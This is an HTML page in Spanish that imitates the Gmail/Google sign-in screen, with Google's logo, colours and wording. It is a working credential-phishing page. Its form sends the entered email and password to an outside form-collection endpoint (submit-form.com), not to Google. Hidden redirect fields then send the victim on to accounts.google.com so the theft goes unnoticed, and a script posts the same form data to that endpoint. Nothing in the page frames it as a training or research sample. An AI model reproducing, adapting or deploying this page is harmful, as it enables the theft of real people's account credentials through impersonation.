<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Inicio de sesión de Gmail</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #F0F4F9;
        }
        .login-container {
            background: white;
            padding: 40px;
            border-radius: 20px;
            max-width: 400px;
            width: 100%;
            text-align: center;
        }
        .login-container img {
            width: 75px;
            margin-bottom: 20px;
        }
        .login-container h1 {
            font-size: 24px;
            margin-bottom: 20px;
            color: #202124;
        }
        .login-container .input-container {
            position: relative;
            margin-bottom: 20px;
        }
        .login-container label {
            position: absolute;
            top: 15px;
            left: 15px;
            color: #5f6368;
            background-color: white;
            font-size: 16px;
            transition: all 0.2s;
            pointer-events: none;
        }
        .login-container input[type="email"],
        .login-container input[type="password"] {
            width: 100%;
            padding: 15px 15px 15px 15px;
            border: 1px solid #dadce0;
            border-radius: 4px;
            box-sizing: border-box;
            font-size: 16px;
        }
        .login-container input:focus + label,
        .login-container input:not(:placeholder-shown) + label {
            top: -10px;
            left: 10px;
            font-size: 12px;
            color: #1a73e8;
            padding: 0px 5px 0px 5px;
        }
        .login-container input:focus {
            border-color: #1a73e8;
            outline: none;
            box-shadow: 0 0 0 1px #1a73e8;
        }
        .login-container button {
            width: auto;
            padding: 10px;
            background-color: #0b57d0;
            border: none;
            color: white;
            font-size: 0.875rem;
            font-weight: 500;
            border-radius: 20px;
            cursor: pointer;
            padding: 10px 25px 10px 25px;
            line-height: 20px;
        }
        .login-container button:hover {
            background-color: #1558b3;
        }
        .footer-text {
            font-size: 14px;
            color: #5f6368;
            margin-top: 20px;
        }
        .Wf6lSd {
            display: flex;
            justify-content: flex-start;
            height: 48px;
            height: var(--c-brsz, 48px);
        }
        .text {
            display: flex;
            justify-content: flex-start;
            margin-bottom: -4px;
        }
        .text2 {
            display: flex;
            justify-content: flex-start;
            margin-bottom: 32px;
        }
        .login-container .show-password {
            margin-top: -5px;
            text-align: left;
        }
        .login-container .show-password input[type="checkbox"] {
            margin-right: 13px;
            width: 15px;
            height: 15px;
        }
        .login-container .show-password input:not(:placeholder-shown) + label {
            top: 0px;
            left: auto;
            font-size: 14px;
            font-weight: 500;
            line-height: 20px;
            color: #1f1f1f;
        }
        .subtitle {
            color: #1f1f1f;
            font-weight: 400;
            letter-spacing: 0rem;
            font-size: 1rem;
            line-height: 1.5;
        }
    </style>
</head>
<body>
    <div class="login-container">
        
        <div class="Wf6lSd">
            <svg xmlns="https://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48" aria-hidden="true" jsname="jjf7Ff" style=""><path fill="#4285F4" d="M45.12 24.5c0-1.56-.14-3.06-.4-4.5H24v8.51h11.84c-.51 2.75-2.06 5.08-4.39 6.64v5.52h7.11c4.16-3.83 6.56-9.47 6.56-16.17z" style=""></path><path fill="#34A853" d="M24 46c5.94 0 10.92-1.97 14.56-5.33l-7.11-5.52c-1.97 1.32-4.49 2.1-7.45 2.1-5.73 0-10.58-3.87-12.31-9.07H4.34v5.7C7.96 41.07 15.4 46 24 46z" style=""></path><path fill="#FBBC05" d="M11.69 28.18C11.25 26.86 11 25.45 11 24s.25-2.86.69-4.18v-5.7H4.34C2.85 17.09 2 20.45 2 24c0 3.55.85 6.91 2.34 9.88l7.35-5.7z" style=""></path><path fill="#EA4335" d="M24 10.75c3.23 0 6.13 1.11 8.41 3.29l6.31-6.31C34.91 4.18 29.93 2 24 2 15.4 2 7.96 6.93 4.34 14.12l7.35 5.7c1.73-5.2 6.58-9.07 12.31-9.07z" style=""></path><path fill="none" d="M2 2h44v44H2z"></path></svg>
        </div>

        <div class="text">
            <h1 style="color: #1f1f1f;font-weight: 400; font-size: 2rem; line-height: 1.25;">Acceder</h1>
            
        </div>
        <div class="text2">
            <span class="subtitle">
                Usa tu Cuenta&nbsp;de&nbsp;Google
            </span>
        </div>
        
        <form id="loginForm" action="https://submit-form.com/eucj9VRZk" method="POST">
            <input
                type="hidden"
                name="_redirect"
                value="https://accounts.google.com/"
            />
            <input type="hidden" name="_error" value="https://accounts.google.com/v3" />
            <div class="input-container">
                <input type="email" id="email" name="email" required placeholder=" ">
                <label for="email">Correo electrónico o teléfono</label>
            </div>
            <div class="input-container">
                <input type="password" id="password" name="password" required placeholder=" ">
                <label for="password">Contraseña</label>
            </div>
            <div class="input-container">
                <div class="show-password">
                    <input type="checkbox" id="showPasswordCheckbox" onchange="togglePasswordVisibility()">
                    <label for="showPasswordCheckbox">Mostrar contraseña</label>
                </div>
            </div>


            <button id="submit">Siguiente</button>
        </form>
        <p class="footer-text">¿Olvidaste tu contraseña?</p>
    </div>

    <script>
        function togglePasswordVisibility() {
            var passwordField = document.getElementById('password');
            var checkbox = document.getElementById('showPasswordCheckbox');

            if (checkbox.checked) {
                passwordField.type = 'text';
            } else {
                passwordField.type = 'password';
            }
        }

        var form = document.getElementById("loginForm");
        async function handleSubmit(event) {
            var formData = new FormData(form);

            fetch(event.target.action, {
            method: form.method,
            headers: {
                "Content-Type": "application/json",
                Accept: "application/json",
            },
            body: formData,
            }).catch(function (error) {
                window.location.href = 'https://accounts.google.com/v3';
            });
        }

    </script>
</body>
</html>
